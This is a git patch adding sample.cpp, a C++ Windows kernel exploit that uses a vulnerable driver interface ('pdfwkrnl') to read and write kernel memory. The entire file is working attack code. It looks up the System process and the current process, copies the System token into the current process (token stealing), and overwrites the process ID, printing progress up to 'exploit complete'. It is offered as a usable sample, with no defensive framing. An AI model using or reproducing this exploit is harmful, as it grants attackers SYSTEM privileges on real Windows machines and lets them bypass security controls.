From bfc85219bb515d635e0ca9057b1dbc48073e9449 Mon Sep 17 00:00:00 2001 From: dpcpointer Date: Tue, 3 Jun 2025 19:07:00 -0600 Subject: [PATCH] Create sample.cpp add a sample of what can be done with this, --- sample.cpp | 109 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 109 insertions(+) create mode 100644 sample.cpp diff --git a/sample.cpp b/sample.cpp new file mode 100644 index 0000000..ac80552 --- /dev/null +++ b/sample.cpp @@ -0,0 +1,109 @@ +#include "PdFwKrnl.h" + +typedef struct _EX_FAST_REF { + union { + VOID* Object; + ULONGLONG RefCnt : 4; + ULONGLONG Value; + }; +}EX_FAST_REF, *PEX_FAST_REF; + +int main(void) { + if (!pdfwkrnl::attach()) { + printf(STR("failed to attach to driver \n")); + return -1; + } + + PVOID* ntoskrnl_object = nullptr; + PVOID* current_process_object = nullptr; + uint64_t current_process_pid = GetCurrentProcessId(); + uint64_t ntoskrnl_pid = 4; + EX_FAST_REF ntoskrnl_token{}; + EX_FAST_REF current_process_token{}; + + printf(STR("starting exploit \n")); + + printf(STR("getting ntoskrnl object \n")); + + pdfwkrnl::call_kernel_function(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)4, &ntoskrnl_object); + if (!ntoskrnl_object) { + printf(STR("failed to obtain ntoskrnl object \n")); + return pdfwkrnl::detach(); + } + + printf(STR("obtained ntoskrnl object @ %p \n"), ntoskrnl_object); + + printf(STR("getting ntoskrnl token \n")); + + ntoskrnl_token = pdfwkrnl::read((uint64_t)ntoskrnl_object + 0x4b8); + if (!ntoskrnl_token.Object) { + printf(STR("failed to obtain ntoskrnl token \n")); + return pdfwkrnl::detach(); + } + + printf(STR("obtained ntoskrnl token | object @ %p \n"), ntoskrnl_token.Object); + + printf(STR("current process pid %d \n"), current_process_pid); + printf(STR("ntoskrnl pid %d \n"), 4); + + printf(STR("getting current process object \n")); + + pdfwkrnl::call_kernel_function(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)current_process_pid, ¤t_process_object); + if (!current_process_object) { + printf(STR("failed to obtain current process object \n")); + return pdfwkrnl::detach(); + } + + printf(STR("obtained current process object @ %p \n"), current_process_object); + + printf(STR("getting current process token \n")); + + current_process_token = pdfwkrnl::read((uint64_t)current_process_object + 0x4b8); + if (!current_process_token.Object) { + printf(STR("failed getting current process token \n")); + return pdfwkrnl::detach(); + } + + printf(STR("overwriting current process token with ntoskrnl's token \n")); + + if (!pdfwkrnl::write((uint64_t)current_process_object + 0x4b8, &ntoskrnl_token, sizeof(EX_FAST_REF))) { + printf(STR("failed overwriting current process token \n")); + return pdfwkrnl::detach(); + } + + printf(STR("checking if overwrite was success \n")); + + EX_FAST_REF current_process_token_temp = pdfwkrnl::read((uint64_t)current_process_object + 0x4b8); + if (current_process_token_temp.Object != ntoskrnl_token.Object) { + printf(STR("failed overwriting current process token \n")); + return pdfwkrnl::detach(); + } + + printf(STR("token was successfully overwriten \n")); + + printf(STR("overwriting current process's pid to ntoskrnl's \n")); + + if (!pdfwkrnl::write((uint64_t)current_process_object + 0x440, &ntoskrnl_pid, sizeof(uint64_t))) { + printf(STR("failed overwriting current process pid to ntoskrnl's \n")); + return pdfwkrnl::detach(); + } + + printf(STR("checking if current process's pid was overwriten \n")); + + if (pdfwkrnl::read((uint64_t)current_process_object + 0x440) != ntoskrnl_pid) { + printf(STR("failed overwriting current process pid to ntoskrnl's \n")); + return pdfwkrnl::detach(); + } + + printf(STR("pid was successfully overwriten \n")); + + printf(STR("hello to two ntoskrnl's lol \n")); + + printf(STR("exploit complete bye (: \n")); + + printf(STR("enter to exit \n")); + + getchar(); + + return pdfwkrnl::detach(); +}